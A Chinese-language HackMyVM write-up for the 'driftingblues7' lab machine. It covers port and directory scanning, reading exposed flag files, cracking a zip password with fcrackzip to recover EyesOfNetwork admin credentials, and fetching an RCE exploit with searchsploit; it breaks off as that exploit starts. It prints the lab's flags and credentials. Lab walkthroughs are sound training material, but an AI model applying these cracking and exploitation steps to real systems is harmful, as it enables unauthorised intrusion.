{"id":538,"date":"2024-04-12T18:10:57","date_gmt":"2024-04-12T10:10:57","guid":{"rendered":"http:\/\/162.14.82.114\/?p=538"},"modified":"2024-04-13T13:44:06","modified_gmt":"2024-04-13T05:44:06","slug":"hmv-_-driftingblues7","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/538\/04\/12\/2024\/","title":{"rendered":"hmv[-_-]driftingblues7"},"content":{"rendered":"<h1>driftingblues7<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810211.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810211.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412163839320\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810214.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810214.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412163937027\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.6 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.6:22\nOpen 172.20.10.6:66\nOpen 172.20.10.6:80\nOpen 172.20.10.6:111\nOpen 172.20.10.6:443\nOpen 172.20.10.6:2403\nOpen 172.20.10.6:3306\nOpen 172.20.10.6:8086\n\nPORT     STATE SERVICE         REASON  VERSION\n22\/tcp   open  ssh             syn-ack OpenSSH 7.4 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzkjX2w5j13avv0y4M6JB6Cz37Ul\/T8n3zMamPEhDo+Kvc9tY7uwllHOVigb9rMtwCAffFu0zBGhKY5ph5n1MRkYyS68OLmDGuj2UWzKd3ZY+ETgOw0dx01GiNvV0pd3nJnaPBS+XflsK2uht9NAU9MXfjjXLqL4vtbu7cplFy6BaGFxU0EstzPFQ2zQI8BCmQUUHC21XOVgrUB4xvYs\/1XpxRYPvIjGJWzMFKTwXvWC1F0rcMvhk\/UpymNjfqWP2TbZnfpgf4xDiEqK+4UEbK9hwFpufkDCNArS6zjJwGRWQsoZewtFy1Yobyu4Tcb\/eB3zZziLVDbW+bjxiQiszP\n|   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFPdaFSwiPtfU8tWyo5LipFZ+3VqLP5Bh9vTXTg8F6tbvXw\/MxeBDVYT4ixLfX2y+AODzyrGWZdz1Dey2JAwzm0=\n|   256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAjhGjsuyeF1S+XQ0uTCoDgO0RC4kNabc0kxds+gzO4l\n66\/tcp   open  http            syn-ack SimpleHTTPServer 0.6 (Python 2.7.5)\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: SimpleHTTP\/0.6 Python\/2.7.5\n|_http-title: Scalable Cost Effective Cloud Storage for Developers\n80\/tcp   open  http            syn-ack Apache httpd 2.4.6 ((CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 Perl\/v5.16.3)\n|_http-title: Did not follow redirect to https:\/\/172.20.10.6\/\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.6 (CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 Perl\/v5.16.3\n111\/tcp  open  rpcbind         syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|_  100000  3,4          111\/udp6  rpcbind\n443\/tcp  open  ssl\/http        syn-ack Apache httpd 2.4.6 ((CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 Perl\/v5.16.3)\n|_http-server-header: Apache\/2.4.6 (CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 Perl\/v5.16.3\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\/emailAddress=root@localhost\/organizationalUnitName=SomeOrganizationalUnit\/localityName=SomeCity\n| Issuer: commonName=localhost\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\/emailAddress=root@localhost\/organizationalUnitName=SomeOrganizationalUnit\/localityName=SomeCity\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-03T14:37:22\n| Not valid after:  2022-04-03T14:37:22\n| MD5:   a0b3:3036:eb25:e23f:3eea:933d:13cd:af6a\n| SHA-1: bb62:831f:6882:89bf:dda2:52d6:d95a:6402:adbf:f0e9\n| -----BEGIN CERTIFICATE-----\n| MIID3jCCAsagAwIBAgICJsgwDQYJKoZIhvcNAQELBQAwgaMxCzAJBgNVBAYTAi0t\n| MRIwEAYDVQQIDAlTb21lU3RhdGUxETAPBgNVBAcMCFNvbWVDaXR5MRkwFwYDVQQK\n| DBBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLDBZTb21lT3JnYW5pemF0aW9uYWxV\n| bml0MRIwEAYDVQQDDAlsb2NhbGhvc3QxHTAbBgkqhkiG9w0BCQEWDnJvb3RAbG9j\n| YWxob3N0MB4XDTIxMDQwMzE0MzcyMloXDTIyMDQwMzE0MzcyMlowgaMxCzAJBgNV\n| BAYTAi0tMRIwEAYDVQQIDAlTb21lU3RhdGUxETAPBgNVBAcMCFNvbWVDaXR5MRkw\n| FwYDVQQKDBBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLDBZTb21lT3JnYW5pemF0\n| aW9uYWxVbml0MRIwEAYDVQQDDAlsb2NhbGhvc3QxHTAbBgkqhkiG9w0BCQEWDnJv\n| b3RAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0EtI\n| b7FbZ3KGy3\/mbivJhLXQR+s9CNK4\/z5akN4U1tfAw1djq8vcCOlCxXxAebFQVqeL\n| 7Rwo9hvHWDE1rtNcSQ8PgJrIcYGTiNUxFJR5qkOvvB+sbVEsLcpJ6JSg6tIYEUXK\n| KLUC5vgB4YtflaxFt1anZ6w6mDPcBGD82D3euO61fAUUDiF336X+rsPG2YsyMC4K\n| vUNofnhfnHYh1oZjBB7Bcj9uRn7Dd07mlyWfx2\/2ym0idQ2KqGB5akps2V\/0u20H\n| k0y\/S2wFXGfz\/zgbldpzzOKdk3aaf102SVWv8zaW1lSM3+\/JSx1e7pJVbbdpDcee\n| pHq1bnm\/zJlSKaVqUwIDAQABoxowGDAJBgNVHRMEAjAAMAsGA1UdDwQEAwIF4DAN\n| BgkqhkiG9w0BAQsFAAOCAQEARFSwvH0GEHZeS7kNbP6oTEYTIWBzt0l\/V9EUnN44\n| ZKNWfIWWzcGAsTuMwO3b7HfHs9RK0mZhNGjZ+voe+uiuhndP4Ao0rwIpLHVLvG1u\n| WYGlJ0ZB0Jsf8E3022SXXBhZseMGF5VonFHXXTnR3a+Cu5IjubScEwBg0YvosQE5\n| n5Do9pVdm58yuA+YUQfe5OsiR\/hGS9Zu76mPlaEJQymUqeFNSt1AVksGf7NIa833\n| 5+\/8GyqIwLEUZmEZ6Gjg9\/yj6Uybe5Ply87PgGPWHdz1luO8wGpL1uXcAlafbaIt\n| NgmTYuExR9j0gO7WUz5JB1jn1ansflsAjCo71BxCIwM99A==\n|_-----END CERTIFICATE-----\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n| http-title: EyesOfNetwork\n|_Requested resource was \/login.php##\n2403\/tcp open  taskmaster2000? syn-ack\n3306\/tcp open  mysql           syn-ack MariaDB (unauthorized)\n8086\/tcp open  http            syn-ack InfluxDB http admin 1.7.9\n|_http-title: Site doesn&#039;t have a title (text\/plain; charset=utf-8)<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">Error: the server returns a status code that matches the provided options for non existing urls. http:\/\/172.20.10.6\/04926594-380d-4b1f-8247-e871066f63b4 =&gt; 302 (Length: 240). To continue please exclude the status code or the length<\/code><\/pre>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.6:66\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.6:66\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              png,php,zip,git,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/user.txt             (Status: 200) [Size: 32]\n\/root.txt             (Status: 200) [Size: 32]\n\/index_files          (Status: 301) [Size: 0] [--&gt; \/index_files\/]<\/code><\/pre>\n<p>\u626b\u7740\u626b\u7740\u53d1\u73b0\u51fa\u5927\u95ee\u9898\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810215.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810215.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170311181\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u91cd\u542f\u9776\u673a\u518d\u626b\u4e00\u6b21\uff0c\u4f9d\u7136\u626b\u5b8c\u7aef\u53e3\u5c31\u5173\u6389\u4e86\u3002\u3002\u3002\u3002\u5636\u3002\u3002\u3002\u6362\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ sudo dirsearch -u http:\/\/172.20.10.3:66 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt 2&gt;\/dev\/null\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 220545\nOutput File: \/home\/kali\/temp\/driftingblues7\/reports\/http_172.20.10.3_66\/_24-04-13_01-25-50.txt\nTarget: http:\/\/172.20.10.3:66\/\n[01:25:50] Starting: \n[01:25:58] 301 -    0B  - \/index_files  -&gt;  \/index_files\/\n[01:32:21] 200 -  248B  - \/eon\nTask Completed<\/code><\/pre>\n<p>\u8fd9\u7b97\u4e92\u8865\u5417\uff0c\u54c8\u54c8\u54c8\u3002<\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810216.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412164301051\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810217.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810217.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412164314626\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6:66\/\/user.txt<\/code><\/pre>\n<pre><code class=\"language-text\">AED508ABE3D1D1303E1C1BC5F1C1BA2B<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6:66\/root.txt<\/code><\/pre>\n<pre><code class=\"language-text\">BD221F968ACB7E069FC7DDE713995C77<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810218.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810218.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412164850543\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6:66\/eon<\/code><\/pre>\n<pre><code class=\"language-text\">UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU\nRw+5YmOf9bS11scvmFBLAQI\/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA\nAABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA\nAQBbAAAARgAAAAAA<\/code><\/pre>\n<p>\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810219.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412165517903\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810220.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810220.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412165632934\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u662f\u4e00\u4e2a\u538b\u7f29\u5305\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810221.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810221.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170049687\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>\u968f\u4fbf\u627e\u4e00\u4e2a\u5728\u7ebf\u5de5\u5177\u641e\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810222.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810222.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170029896\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6709\u5bc6\u7801\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ ls -la                                                         \ntotal 12\ndrwxr-xr-x  2 kali kali 4096 Apr 12 05:05 .\ndrwxr-xr-x 29 kali kali 4096 Apr 12 04:39 ..\n-rw-r--r--  1 kali kali  183 Apr 12 05:05 eon.zip\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ fcrackzip -D -u -p \/usr\/share\/wordlists\/rockyou.txt eon.zip    \n\nPASSWORD FOUND!!!!: pw == killah<\/code><\/pre>\n<p>\u5f97\u5230\u5bc6\u7801\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ unzip eon.zip    \nArchive:  eon.zip\n[eon.zip] creds.txt password: \n extracting: creds.txt               \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ cat creds.txt \nadmin\nisitreal31__<\/code><\/pre>\n<h3>\u767b\u5f55\u7ba1\u7406\u7cfb\u7edf<\/h3>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810223.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810223.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170855359\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810224.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810224.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170937770\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810225.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810225.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412171118670\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u6f0f\u6d1e\u5229\u7528<\/h3>\n<p>\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u662f\u5426\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810226.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810226.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412171213734\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">searchsploit eyesofnetwork\nsearchsploit -m multiple\/webapps\/49432.sh\ncat 49432.sh\n.\/49432.sh\n                 ,*-.\n                 |  |\n             ,.  |  |\n             | |_|  | ,.\n             `---.  |_| |\n                 |  .--`\n                 |  |\n                 |  |\n\u03a9\n ! DO NOT 